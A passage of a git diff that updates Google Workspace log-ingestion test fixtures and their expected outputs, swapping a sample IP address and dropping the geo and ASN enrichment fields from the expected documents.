"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "ingested": "2021-12-09T13:39:16.340925400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", "action": "account_disabled_hijacked", @@ -703,7 +559,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -722,35 +578,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429423100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"gov_attack_warning\"}}", + "ingested": "2021-12-09T13:39:16.340931600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"gov_attack_warning\"}}", "provider": "login", "action": "gov_attack_warning", "id": "1", @@ -780,7 +618,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -804,35 +642,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429424600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_failure_type\",\"value\":\"login_failure_access_code_disallowed\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", + "ingested": "2021-12-09T13:39:16.340937700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_failure_type\",\"value\":\"login_failure_access_code_disallowed\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_failure", "id": "1", @@ -864,7 +684,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -888,35 +708,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429425900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_challenge\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", + "ingested": "2021-12-09T13:39:16.340943800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_challenge\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_challenge", "id": "1", @@ -947,7 +749,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -971,35 +773,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429427500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_verification\",\"parameters\":[{\"name\":\"is_second_factor\",\"boolValue\":false},{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", + "ingested": "2021-12-09T13:39:16.340950400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_verification\",\"parameters\":[{\"name\":\"is_second_factor\",\"boolValue\":false},{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"login_challenge_status\",\"value\":\"Challenge Passed.\"},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_verification", "id": "1", @@ -1030,7 +814,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1052,35 +836,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429429Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"logout\",\"parameters\":[{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", + "ingested": "2021-12-09T13:39:16.340956600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"logout\",\"parameters\":[{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "logout", "id": "1", @@ -1111,7 +877,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1134,35 +900,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429430400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"is_suspicious\",\"boolValue\":false},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", + "ingested": "2021-12-09T13:39:16.340962800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"login_challenge_method\",\"value\":\"backup_code\"},{\"name\":\"is_suspicious\",\"boolValue\":false},{\"name\":\"login_type\",\"value\":\"exchange\"}]}}", "provider": "login", "action": "login_success", "id": "1", diff --git a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log index ed672b58a56..ca7933706be 100644 --- a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log +++ b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log @@ -1,2 +1,2 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} diff --git a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json index d9d62d4b2d2..ded2713b385 100644 --- a/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json +++ b/packages/google_workspace/data_stream/saml/_dev/test/pipeline/test-saml.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -37,35 +37,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.810436900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", + "ingested": "2021-12-09T13:39:18.166836800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "provider": "saml", "action": "login_failure", "id": "1", @@ -97,7 +79,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -122,35 +104,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.810447600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", + "ingested": "2021-12-09T13:39:18.166844900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "provider": "saml", "action": "login_success", "id": "1", diff --git a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log index 7da8fdec935..230deadf26e 100644 --- a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log +++ b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log @@ -1,8 +1,8 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"2sv_change","name":"2sv_disable"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"2sv_change","name":"2sv_enroll"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"password_change","name":"password_edit"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_email_edit"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_phone_edit"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"recovery_info_change","name":"recovery_secret_qa_edit"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"titanium_change","name":"titanium_enroll"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"titanium_change","name":"titanium_unenroll"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"2sv_change","name":"2sv_disable"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"2sv_change","name":"2sv_enroll"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"password_change","name":"password_edit"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_email_edit"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_phone_edit"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_secret_qa_edit"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"titanium_change","name":"titanium_enroll"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"titanium_change","name":"titanium_unenroll"}} diff --git a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json index ff14c0f518f..abfbeea015e 100644 --- a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json +++ b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -29,35 +29,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.912659600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_disable\"}}", + "ingested": "2021-12-09T13:39:18.537558Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_disable\"}}", "provider": "user_accounts", "action": "2sv_disable", "id": "1", @@ -88,7 +70,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -107,35 +89,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.912663400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_enroll\"}}", + "ingested": "2021-12-09T13:39:18.537562500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_enroll\"}}", "provider": "user_accounts", "action": "2sv_enroll", "id": "1", @@ -166,7 +130,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -185,35 +149,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": 